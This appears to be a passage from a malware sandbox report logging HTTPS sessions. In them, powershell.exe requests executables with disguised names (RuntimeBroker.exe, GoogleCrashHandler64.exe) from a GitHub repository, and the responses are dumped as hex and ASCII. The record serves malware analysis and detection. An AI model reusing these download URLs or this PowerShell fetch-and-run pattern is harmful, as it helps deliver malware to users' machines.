73 69 67 6e 75 70
                                                                                              Data Ascii: a-support" value="unknown"><input type="hidden" name="return_to" id="return_to" value="https://github.com/gowgerrie/reborn/raw/main/04/RuntimeBroker.exe" autocomplete="off" class="form-control" /><input type="hidden" name="allow_signup" id="allow_signup
                                                                                              2022-08-10 04:48:03 UTC466INData Raw: 69 6e 25 32 46 30 34 25 32 46 52 75 6e 74 69 6d 65 42 72 6f 6b 65 72 2e 65 78 65 26 61 6d 70 3b 73 6f 75 72 63 65 3d 68 65 61 64 65 72 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 6c 69 6e 6b 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 64 2d 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 62 6f 72 64 65 72 20 63 6f 6c 6f 72 2d 62 6f 72 64 65 72 2d 64 65 66 61 75 6c 74 20 72 6f 75 6e 64 65 64 20 70 78 2d 32 20 70 79 2d 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 68 79 64 72 6f 2d 63 6c 69 63 6b 3d 22 7b 26 71 75 6f 74 3b 65 76 65 6e 74 5f 74 79 70 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 2e 63 6c 69 63 6b 26 71 75 6f
                                                                                              Data Ascii: in%2F04%2FRuntimeBroker.exe&amp;source=header" class="HeaderMenu-link flex-shrink-0 d-inline-block no-underline border color-border-default rounded px-2 py-1" data-hydro-click="{&quot;event_type&quot;:&quot;authentication.click&quo
                                                                                              2022-08-10 04:48:03 UTC467INData Raw: 64 65 6e 3d 22 74 72 75 65 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 78 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 33 2e 37 32 20 33 2e 37 32 61 2e 37 35 2e 37 35 20 30 20 30 31 31 2e 30 36 20 30 4c 38 20 36 2e 39 34 6c 33 2e 32 32 2d 33 2e 32 32 61 2e 37 35 2e 37 35 20 30 20 31 31 31 2e 30 36 20 31 2e 30 36 4c 39 2e 30 36 20 38 6c 33 2e 32 32 20 33 2e 32 32 61 2e 37 35 2e 37 35 20 30 20 31 31 2d 31 2e 30 36
                                                                                              Data Ascii: den="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06
                                                                                              2022-08-10 04:48:03 UTC468INData Raw: 48 43 41 63 48 42 67 6b 4a 43 67 6f 4a 43 51 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 45 44 41 77 4d 46 42 41 55 4a 42 67 59 4a 44 51 73 4a 43 77 30 50 44 67 34 4f 44 67 38 50 44 41 77 4d 44 41 77 50 44 77 77 4d 44 41 77 4d 44 41 38 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 2f 38 41 41 45 51 67 42 6e 77 4f 73 41 77 45 52 41 41 49 52 41 51 4d 52 41 66 2f 45 41 4c 59 41 41 41 4d 42 41 51 45 42 41 51 41 41 41 41 41 41 41 41 41 41 41 41 45 43 41 77 41 45 42 51 59 49 41 51 45 42 41 51 45 42 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 51 49 44 42 41 63 51 41 41 45 44 41 77 4d 43 41 77 55 47 42 41 45 47 43 77 67 43 41 77 45 41 45 53 45 78 41 68 4a 42 55 57 46 78 67 5a
                                                                                              Data Ascii: HCAcHBgkJCgoJCQwMDAwMDAwMDAwMDAwMDAEDAwMFBAUJBgYJDQsJCw0PDg4ODg8PDAwMDAwPDwwMDAwMDA8MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwM/8AAEQgBnwOsAwERAAIRAQMRAf/EALYAAAMBAQEBAQAAAAAAAAAAAAECAwAEBQYIAQEBAQEBAQAAAAAAAAAAAAAAAQIDBAcQAAEDAwMCAwUGBAEGCwgCAwEAESExAhJBUWFxgZ
                                                                                              2022-08-10 04:48:03 UTC470INData Raw: 4c 67 50 78 51 4c 39 4d 62 4b 4b 47 48 43 42 63 4f 47 36 4b 52 51 4e 71 51 35 69 47 78 46 4c 67 6d 54 42 54 61 70 46 49 62 55 55 70 73 34 51 4c 68 77 6d 63 4c 6a 4a 44 61 52 6f 70 41 70 73 65 61 49 74 4c 39 4e 51 49 62 44 71 6f 70 44 59 4f 36 42 66 70 68 54 4b 34 49 62 4f 50 42 52 55 38 57 68 75 36 42 63 5a 68 52 53 34 74 32 55 55 70 74 65 45 71 78 4d 32 6d 72 39 30 43 47 32 43 69 6b 4e 70 32 64 31 43 46 4e 71 67 58 45 37 49 4f 45 43 42 48 52 64 48 4f 6d 41 62 70 6f 71 68 67 50 46 55 55 41 34 36 49 68 32 6c 58 41 63 57 37 55 33 52 44 67 61 30 34 56 51 34 47 79 42 78 61 2f 78 52 4f 63 34 44 4b 6f 66 47 56 51 34 74 6e 37 45 52 51 57 6a 5a 57 49 63 57 2f 65 69 6e 46 70 31 56 53 6d 46 74 46 55 55 46 70 53 4c 54 43 7a 38 56 57 54 69 31 51 4f 4c 55 44 43 78 31
                                                                                              Data Ascii: LgPxQL9MbKKGHCBcOG6KRQNqQ5iGxFLgmTBTapFIbUUps4QLhwmcLjJDaRopApseaItL9NQIbDqopDYO6BfphTK4IbOPBRU8Whu6BcZhRS4t2UUpteEqxM2mr90CG2CikNp2d1CFNqgXE7IOECBHRdHOmAbpoqhgPFUUA46Ih2lXAcW7U3RDga04VQ4GyBxa/xROc4DKofGVQ4tn7ERQWjZWIcW/einFp1VSmFtFUUFpSLTCz8VWTi1QOLUDCx1
                                                                                              2022-08-10 04:48:03 UTC471INData Raw: 6f 32 30 52 61 6d 62 57 52 51 59 66 65 6f 52 35 59 41 48 44 4c 74 4b 35 55 77 43 31 47 56 42 61 33 78 51 70 77 46 57 61 6f 4c 54 73 67 70 62 59 2b 69 46 55 46 68 30 46 56 54 4a 78 59 55 53 71 43 7a 64 56 46 42 59 37 53 71 69 67 39 4d 43 74 55 54 4f 54 69 77 4b 6f 6f 4c 41 68 56 42 61 4e 75 36 46 50 62 5a 77 72 6c 4d 4b 43 78 51 70 78 61 4f 71 73 51 34 74 4f 79 71 47 46 69 42 38 65 46 59 48 46 68 56 51 77 39 4e 45 4f 4c 41 67 59 57 38 4b 77 50 67 67 62 41 49 6d 54 43 31 41 32 50 44 49 6f 34 4b 6f 63 57 64 30 4b 59 57 49 68 73 41 67 49 73 47 79 71 47 46 76 43 4c 79 47 77 4b 49 49 39 4d 6f 55 33 30 39 30 6f 50 30 77 6c 44 43 77 62 49 44 69 4e 6c 63 4a 6b 63 65 79 41 34 6f 44 69 6e 4d 66 45 52 59 67 4f 43 41 34 42 41 63 41 68 57 77 53 67 34 63 49 67 34 63 49
                                                                                              Data Ascii: o20RambWRQYfeoR5YAHDLtK5UwC1GVBa3xQpwFWaoLTsgpbY+iFUFh0FVTJxYUSqCzdVFBY7Sqig9MCtUTOTiwKooLAhVBaNu6FPbZwrlMKCxQpxaOqsQ4tOyqGFiB8eFYHFhVQw9NEOLAgYW8KwPggbAImTC1A2PDIo4KocWd0KYWIhsAgIsGyqGFvCLyGwKII9MoU3090oP0wlDCwbIDiNlcJkceyA4oDinMfERYgOCA4BAcAhWwSg4cIg4cI
                                                                                              2022-08-10 04:48:03 UTC475INData Raw: 6f 34 46 43 74 67 64 6b 4b 4f 42 32 51 72 59 4b 46 48 42 43 68 39 4e 55 6f 2f 54 55 4b 33 30 79 6c 41 77 51 48 44 68 42 73 43 68 41 78 4b 68 47 78 54 34 72 4f 52 73 54 73 67 32 4a 32 51 62 45 37 49 4e 69 64 6c 42 73 65 45 55 4d 55 47 78 53 4c 51 77 55 47 77 43 46 62 43 31 43 68 67 45 79 59 44 44 67 4b 44 59 6f 46 78 4f 79 4b 32 4a 51 44 48 68 41 44 61 68 43 34 42 41 44 59 69 77 75 48 43 6d 63 6d 4d 42 67 64 6b 61 44 41 37 49 6d 41 77 34 55 69 6c 50 70 70 43 6c 77 53 4c 53 2f 54 51 4b 66 54 55 43 2f 54 47 79 51 44 36 59 32 55 79 75 43 48 30 78 73 69 6b 4e 68 43 68 67 70 74 55 55 68 73 34 52 53 47 31 41 68 74 52 53 47 7a 68 51 49 66 54 4b 4b 51 32 48 62 75 6f 71 64 31 69 69 70 6d 77 71 5a 79 45 4e 69 4c 6a 4b 5a 39 4d 4b 4b 6d 62 4e 6c 46 54 4e 76 43 4b 6d
                                                                                              Data Ascii: o4FCtgdkKOB2QrYKFHBCh9NUo/TUK30ylAwQHDhBsChAxKhGxT4rORsTsg2J2QbE7INidlBseEUMUGxSLQwUGwCFbC1ChgEyYDDgKDYoFxOyK2JQDHhADahC4BADYiwuHCmcmMBgdkaDA7ImAw4UilPppClwSLS/TQKfTUC/TGyQD6Y2UyuCH0xsikNhChgptUUhs4RSG1AhtRSGzhQIfTKKQ2Hbuoqd1iipmwqZyENiLjKZ9MKKmbNlFTNvCKm
                                                                                              2022-08-10 04:48:03 UTC476INData Raw: 56 4f 5a 65 64 49 32 36 49 75 45 7a 5a 43 4c 68 50 46 53 4c 58 6a 69 33 52 64 33 6e 56 46 76 5a 57 43 67 74 32 56 78 68 4d 71 32 32 71 78 46 72 62 55 46 52 59 79 72 4f 63 71 32 32 63 49 4b 32 32 4c 54 4b 67 73 56 46 52 36 61 43 67 73 56 52 55 57 55 52 4b 63 57 42 45 55 46 6e 43 71 4b 69 7a 68 41 34 74 43 45 4f 4c 53 56 55 4f 4c 41 67 63 57 72 55 51 32 43 6d 44 4b 67 39 50 68 56 4c 67 34 73 51 4e 68 77 69 6d 78 4b 56 44 44 30 7a 71 68 6e 4a 68 36 59 33 52 44 34 42 43 6d 46 67 36 6f 6c 48 45 62 4f 6e 4b 70 73 65 45 51 77 73 56 49 62 42 41 63 55 42 78 51 67 69 31 44 4f 44 59 38 46 43 44 67 64 6c 51 63 45 42 77 55 77 5a 4d 4c 46 53 74 67 46 4b 44 67 46 55 6f 69 30 64 55 4b 4f 41 32 55 6f 4f 48 41 51 70 73 56 55 62 48 6c 52 52 78 51 6a 59 71 6f 32 49 55 57 44
                                                                                              Data Ascii: VOZedI26IuEzZCLhPFSLXji3Rd3nVFvZWCgt2VxhMq22qxFrbUFRYyrOcq22cIK22LTKgsVFR6aCgsVRUWURKcWBEUFnCqKizhA4tCEOLSVUOLAgcWrUQ2CmDKg9PhVLg4sQNhwimxKVDD0zqhnJh6Y3RD4BCmFg6olHEbOnKpseEQwsVIbBAcUBxQgi1DODY8FCDgdlQcEBwUwZMLFStgFKDgFUoi0dUKOA2UoOHAQpsVUbHlRRxQjYqo2IUWD
                                                                                              2022-08-10 04:48:03 UTC479INData Raw: 53 6c 42 78 50 41 52 4b 32 42 34 53 6a 59 38 71 56 57 78 37 70 52 73 45 35 54 6b 48 44 68 55 72 59 67 61 4b 4c 7a 68 69 4e 6b 4c 42 59 62 4b 31 41 78 35 51 62 47 45 6f 47 4a 52 57 78 4b 58 42 79 73 78 53 6b 44 48 68 4b 52 73 55 4b 32 43 46 59 32 37 4b 4c 57 78 51 62 45 6f 41 31 56 46 44 44 67 4a 43 68 6a 6f 79 4c 47 59 65 43 68 6e 44 59 38 49 6b 42 68 73 68 41 49 37 71 4c 41 4e 76 43 6f 55 32 46 46 77 42 73 4f 79 6b 4b 58 45 70 46 44 46 49 52 73 65 46 49 46 4e 69 42 54 36 66 43 42 44 36 61 6d 57 73 42 67 71 6c 4b 62 46 6c 53 6d 78 43 6b 4e 6e 43 6a 56 4b 62 47 52 4b 55 32 68 44 6c 49 62 45 56 4d 32 62 4b 4b 51 32 37 6f 71 64 31 69 67 6b 62 57 35 54 4b 34 54 4e 71 67 6b 62 53 46 6c 70 4d 32 75 69 6f 6d 31 53 71 6c 64 62 34 4a 6c 63 59 53 75 74 51 77 6a 64
                                                                                              Data Ascii: SlBxPARK2B4SjY8qVWx7pRsE5TkHDhUrYgaKLzhiNkLBYbK1Ax5QbGEoGJRWxKXBysxSkDHhKRsUK2CFY27KLWxQbEoA1VFDDgJChjoyLGYeChnDY8IkBhshAI7qLANvCoU2FFwBsOykKXEpFDFIRseFIFNiBT6fCBD6amWsBgqlKbFlSmxCkNnCjVKbGRKU2hDlIbEVM2bKKQ27oqd1igkbW5TK4TNqgkbSFlpM2uiom1Sqldb4JlcYSutQwjd
                                                                                              2022-08-10 04:48:03 UTC482INData Raw: 57 32 71 34 52 61 32 31 56 46 52 61 72 68 4d 71 69 30 37 4b 6b 55 46 6e 43 43 77 73 33 43 76 49 79 63 57 6e 6f 67 70 62 36 5a 51 7a 6c 51 57 4a 68 4d 6e 46 72 71 6e 4d 6f 4c 45 6f 6f 4c 42 73 69 48 78 47 79 48 4b 49 74 34 56 53 48 46 72 6f 70 68 62 32 52 44 69 33 68 56 42 46 71 59 79 5a 77 59 57 68 43 47 62 68 41 63 54 73 71 47 77 51 6f 69 31 43 69 4c 53 61 71 55 4e 6a 52 4b 44 67 69 55 63 56 4b 44 69 45 42 78 47 67 51 46 6b 42 5a 55 78 68 6d 51 6a 4e 77 69 77 55 53 4d 68 42 78 4f 71 4b 32 4a 51 48 45 6f 58 41 34 6f 6a 59 70 51 63 66 4a 41 63 51 68 68 6d 55 6f 4f 50 44 6f 44 6a 77 67 32 4a 32 51 48 45 6f 52 68 61 64 6b 4d 74 69 64 6b 47 78 4b 69 6a 67 56 59 4e 69 55 4d 59 62 45 37 6f 52 73 44 48 6d 67 32 42 4b 63 35 7a 44 67 55 47 77 4a 51 48 41 38 49 4e
                                                                                              Data Ascii: W2q4Ra21VFRarhMqi07KkUFnCCws3CvIycWnogpb6ZQzlQWJhMnFrqnMoLEooLBsiHxGyHKIt4VSHFrophb2RDi3hVBFqYyZwYWhCGbhAcTsqGwQoi1CiLSaqUNjRKDgiUcVKDiEBxGgQFkBZUxhmQjNwiwUSMhBxOqK2JQHEoXA4ojYpQcfJAcQhhmUoOPDoDjwg2J2QHEoRhadkMtidkGxKijgVYNiUMYbE7oRsDHmg2BKc5zDgUGwJQHA8IN
                                                                                              2022-08-10 04:48:03 UTC484INData Raw: 48 5a 41 47 31 43 74 51 70 47 36 42 53 4b 73 69 34 79 42 74 37 49 45 4e 72 66 63 70 46 6f 49 46 4e 71 67 51 69 76 47 69 4c 53 45 66 67 69 30 6a 4b 4c 6b 68 74 51 54 4e 71 68 55 79 46 49 71 64 31 71 43 52 46 59 55 61 53 49 51 52 75 74 55 58 47 55 69 46 46 52 75 74 54 4b 34 51 75 43 79 71 46 77 53 4b 6d 30 72 4b 38 72 67 74 48 43 36 59 77 35 35 57 74 43 71 5a 58 74 43 75 45 58 74 74 68 44 4f 46 37 62 59 57 6d 58 54 5a 36 48 71 33 42 37 66 54 75 75 42 2f 69 41 4c 4c 4f 64 70 70 78 7a 35 77 31 6a 5a 36 73 38 32 4d 75 6e 30 2f 77 42 48 2b 70 76 66 44 39 50 36 74 37 56 41 73 4a 2b 43 7a 6e 69 4e 6e 70 35 39 57 4f 6e 44 57 4e 68 74 4e 58 4e 70 7a 30 5a 64 4e 6e 37 64 2b 75 75 4c 57 2f 6f 2f 58 75 4a 6f 42 36 64 7a 2b 35 59 7a 78 6d 78 78 69 2f 37 39 50 54 68 63
                                                                                              Data Ascii: HZAG1CtQpG6BSKsi4yBt7IENrfcpFoIFNqgQivGiLSEfgi0jKLkhtQTNqhUyFIqd1qCRFYUaSIQRutUXGUiFFRutTK4QuCyqFwSKm0rK8rgtHC6Yw55WtCqZXtCuEXtthDOF7bYWmXTZ6Hq3B7fTuuB/iALLOdppxz5w1jZ6s82Mun0/wBH+pvfD9P6t7VAsJ+CzniNnp59WOnDWNhtNXNpz0ZdNn7d+uuLW/o/XuJoB6dz+5Yzxmxxi/79PThc
                                                                                              2022-08-10 04:48:03 UTC487INData Raw: 79 5a 55 7a 2b 34 6e 44 62 72 58 30 34 58 48 32 42 78 47 39 30 39 47 56 68 2f 53 6a 39 58 54 2f 66 48 6f 2f 39 31 64 2f 6e 4c 48 75 4c 73 64 7a 71 37 57 4f 70 76 32 2f 32 32 2b 30 39 47 65 74 68 2f 53 6e 39 57 66 38 41 38 74 36 4c 37 66 53 75 2b 31 50 63 58 59 37 6e 56 30 34 36 6a 32 2b 32 32 2b 30 39 47 65 74 61 33 2b 6c 48 72 6e 2f 38 31 59 4e 78 39 41 78 2f 38 78 63 2f 63 62 52 75 4d 39 72 36 58 54 32 2b 31 37 2f 48 5a 2b 70 6a 2f 53 6e 31 6e 41 2f 33 31 59 51 59 66 36 42 72 2f 77 42 34 6e 75 4e 6f 33 47 65 31 39 4a 37 66 61 39 2f 6a 73 2f 55 73 50 36 54 58 4d 48 2f 66 51 43 61 6a 2f 5a 6f 48 2f 77 41 30 4c 47 66 33 48 78 65 54 68 2b 2f 39 44 65 50 32 39 7a 4f 58 69 4f 35 39 54 66 32 6d 4a 4c 66 37 2b 31 6e 2f 41 4d 4c 70 2f 77 42 38 70 37 6a 2f 41 4e
                                                                                              Data Ascii: yZUz+4nDbrX04XH2BxG909GVh/Sj9XT/fHo/91d/nLHuLsdzq7WOpv2/22+09Geth/Sn9Wf8A8t6L7fSu+1PcXY7nV046j2+22+09Geta3+lHrn/81YNx9Ax/8xc/cbRuM9r6XT2+17/HZ+pj/Sn1nA/31YQYf6Br/wB4nuNo3Ge19J7fa9/js/UsP6TXMH/fQCaj/ZoH/wA0LGf3HxeTh+/9DeP29zOXiO59Tf2mJLf7+1n/AMLp/wB8p7j/AN


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              7192.168.11.2049815140.82.121.4443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2022-08-10 04:48:03 UTC429OUTGET /gowgerrie/reborn/raw/main/04/GoogleCrashHandler64.exe HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                              Host: github.com
                                                                                              Connection: Keep-Alive
                                                                                              2022-08-10 04:48:03 UTC471INHTTP/1.1 404 Not Found
                                                                                              Server: GitHub.com
                                                                                              Date: Wed, 10 Aug 2022 04:47:36 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                              permissions-policy: interest-cohort=()
                                                                                              Cache-Control: no-cache
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                              X-Frame-Options: deny
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 0
                                                                                              Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                                                                              Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                              2022-08-10 04:48:03 UTC473INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                              Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.
                                                                                              2022-08-10 04:48:03 UTC474INData Raw: 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 22 3e 0a 20 20 3c 6c 69 6e 6b
                                                                                              Data Ascii: <!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link
                                                                                              2022-08-10 04:48:03 UTC478INData Raw: 61 77 73 2e 63 6f 6d 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 72 2d 69 6d 61 67 65 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 76 61 74 61 72 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 22 3e 0a 0a 0a 0a 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69
                                                                                              Data Ascii: aws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <link crossori
                                                                                              2022-08-10 04:48:03 UTC480INData Raw: 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 55 52 50 53 76 69 43 77 34 6d 34 6e 37 31 49 4b 6e 34 71 79 75 37 4d 45 44 70 47 62 43 69 54 66 73 4d 54 4e 72 55 6a 50 77 63 67 33 38 4b 74 45 4b 44 74 31 32 76 7a 6a 6c 4e 7a 6f 79 33 59 44 46 69 51 38 44 30 54 43 43 59 4b 43 74 72 5a 70 71 58 30 39 37 67 3d 3d 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 64 61 72 6b 5f 63 6f 6c 6f 72 62 6c 69 6e 64 2d 35 31 31 33 64 32 62 65 32 30 62 30 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 63 6f 6c 6f 72 62 6c 69 6e 64 22 20 63 72 6f 73 73
                                                                                              Data Ascii: egrity="sha512-URPSviCw4m4n71IKn4qyu7MEDpGbCiTfsMTNrUjPwcg38KtEKDt12vzjlNzoy3YDFiQ8D0TCCYKCtrZpqX097g==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-5113d2be20b0.css" /><link data-color-theme="light_colorblind" cross
                                                                                              2022-08-10 04:48:03 UTC483INData Raw: 2f 3e 0a 20 20 0a 20 20 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 53 55 71 79 45 51 6f 71 69 79 62 46 34 54 47 64 4c 48 30 74 68 34 76 44 4c 39 49 39 45 46 47 54 58 66 63 74 68 39 43 49 56 41 6f 4e 65 51 4a 66 41 79 66 75 38 4d 74 6d 4f 4d 57 62 47 6e 71 50 36 56 78 46 49 51 36 56 64 44 48 78 68 64 58 4e 47 31 6b 2f 2f 51 3d 3d 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 70 72 69 6d 65 72 2d 34 39 34 61 62 32 31 31 30 61 32 61 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c
                                                                                              Data Ascii: /> <link crossorigin="anonymous" media="all" integrity="sha512-SUqyEQoqiybF4TGdLH0th4vDL9I9EFGTXfcth9CIVAoNeQJfAyfu8MtmOMWbGnqP6VxFIQ6VdDHxhdXNG1k//Q==" rel="stylesheet" href="https://github.githubassets.com/assets/primer-494ab2110a2a.css" /> <
                                                                                              2022-08-10 04:48:03 UTC486INData Raw: 52 70 30 61 32 52 43 5a 4e 59 72 46 4a 59 46 6c 59 68 64 44 55 32 50 2b 55 43 38 61 78 67 56 54 31 37 6f 71 76 31 42 56 51 4c 6e 67 53 73 47 6f 69 42 4e 32 4d 4a 70 77 3d 3d 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 6d 61 6e 75 65 6c 70 75 79 6f 6c 5f 74 75 72 62 6f 5f 64 69 73 74 5f 74 75 72 62 6f 5f 65 73 32 30 31 37 2d 65 73 6d 5f 6a 73 2d 38 61 66 39 62 61 65 66 61 62 39 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74
                                                                                              Data Ascii: Rp0a2RCZNYrFJYFlYhdDU2P+UC8axgVT17oqv1BVQLngSsGoiBN2MJpw==" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-8af9baefab9e.js"></script><script crossorigin="anonymous" defer="defer" type="applicat
